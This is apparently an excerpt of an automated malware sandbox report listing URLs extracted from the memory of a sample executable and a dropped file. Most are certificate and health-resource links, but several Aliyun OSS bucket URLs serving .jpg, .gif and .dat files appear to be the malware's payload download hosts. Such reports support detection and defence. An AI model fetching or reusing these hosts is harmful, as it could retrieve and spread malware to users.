Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://sw.symcd.com0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 4mPVjj.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 4mPVjj.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 4mPVjj.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.apa.org/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.cdc.gov/coronavirus/2019-ncov/daily-life-coping/managing-stress-anxiety.html)
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.cdc.gov/healthywater/hygiene/etiquette/coughing_sneezing.html)
Source: 189atohci.sys.0.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.mindful.org/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.oisd.gov.in/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.samhsa.gov/find-treatment)
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.sleepassociation.org/)
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.suicidepreventionlifeline.org/GetHelp/LifelineChat.aspx)
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://www.youtube.com/watch?v=1r2C1zGUHbU)
Source: 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376240582.00000000005DA000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/
Source: 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/&
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1003
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003-Z
Source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
Source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg_tN
Source: 4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
Source: 4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000138000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
Source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg0u
Source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgLj
Source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgca
Source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgwaq
Source: 4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
Source: 4mPVjj.exe, 00000006.00000002.3375987513.000000000014E000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.000000000014B000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000146000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3375987513.0000000000141000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgl
Source: 4mPVjj.exe, 00000006.00000003.3318945426.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgww
Source: 4mPVjj.exe, 00000006.00000002.3375987513.0000000000138000.00000004.00000010.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat
Source: 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat6
Source: 4mPVjj.exe, 00000006.00000002.3376443470.0000000000605000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datM
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datpData
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ft
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1003
Source: 4mPVjj.exe, 00000006.00000002.3376240582.0000000000597000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-10036
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: 4mPVjj.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0)
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://docs.google.com/presentation/d/14vaYnp9m6tmQ8DOx3-BQX72dFaslhN4ZsD-CysO9N3g/edit)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://ehs.yale.edu/sites/default/files/files/covid-19-cleaning-computers-electronics.pdf)
Source: 13478674376-78423498.01.exe	String found in binary or memory: https://emergency.cdc.gov/coping/selfcare.asp)
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/2
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001159000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gif
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001159000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gif-
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gifA
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001123000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001123000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gifhttps://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gifht
Source: 13478674376-78423498.01.exe, 00000000.00000003.3004759301.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/a.gifs.com
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022160747.0000000001159000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://hdsuer.oss-cn-shanghai.aliyuncs.com/b.gif
